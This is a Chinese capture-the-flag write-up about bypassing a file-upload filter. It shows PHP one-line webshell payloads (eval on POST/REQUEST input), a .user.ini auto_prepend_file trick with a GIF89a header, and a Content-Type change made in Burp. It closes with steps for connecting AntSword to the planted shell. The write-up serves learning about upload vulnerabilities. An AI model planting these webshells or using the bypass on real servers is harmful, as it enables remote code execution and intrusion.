题目
F12查看源代码
题目提示上传后门
黑客技术:文件上传漏洞——一句话木马原理 - 知乎 (zhihu.com)
上传包含下述playload的png格式文件
<?php@eval($_POST[“shell”]);?>
报道被过滤了
文件上传漏洞(绕过姿势) - blacksunny - 博客园 (cnblogs.com)
[Web安全]文件上传漏洞及绕过基础详解+实操_截断绕过-CSDN博客
实战 | 文件上传漏洞之最全代码检测绕过总结-腾讯云开发者社区-腾讯云 (tencent.com)
尝试bp抓包绕过
各种方法失败.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令):
尝试.user.ini绕过
由于后端逻辑验证多为php文件实现,故可使用fastcgi的.user.ini特性进行任意命令执行。
.user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。
auto_prepend_file 是 PHP 配置选项之一,用于指定一个在每个 PHP 脚本执行前自动包含的文件。
当 auto_prepend_file 配置启用后,PHP 在执行每个脚本之前会自动将指定的文件包含进来,作为脚本的一部分。这个文件可以包含一些通用的代码、函数、类或初始化操作,以便在每个脚本中都能自动执行。
因此,我们可以传入.user.ini文件,通过auto_prepend_file将含有一句话木马的文件名称包含到每个文件中。然后再上传该文件
利用.user.ini构建php后门_php .user.ini-CSDN博客
新建一个文本文件,将如下写入
GIF89a
auto_prepend_file=x.jpg
左上角文件另存为.user.ini文件 后上传
由于内容为x.jpg,故抓包后要将Content-Type(内容类型)由application/octet-stream改为image/jpg
注删除一些奇怪的东西,容易上传不成功。要死了,被搞的 。
再建一个x.jpg文件
GIF89a
<?=eval($_REQUEST['x']);?>
上传之前F12网络记录加载的文件找到对应的上传地址
http://61.147.171.105:50652/uploads/index.php
在连接webshell注意一个小事项,就是页面返回的上传路径并不是你的蚁剑、菜刀等工具连接时的路径。如果你的连接路径是http://x.x.x.x:端口/uploads/shell.jpg这样的话,是不对的。
正确的连接url地址应为http://x.x.x.x:端口/uploads/index.php (请回想.user.ini文件及auto_prepend_file方法)
打开地址前面有GIF89a 说明是这个地址不要搞错url不然连接不上(呜呜呜)
上蚁剑连接后门,不要用校园网,会阻断(学校有安全策略)报错。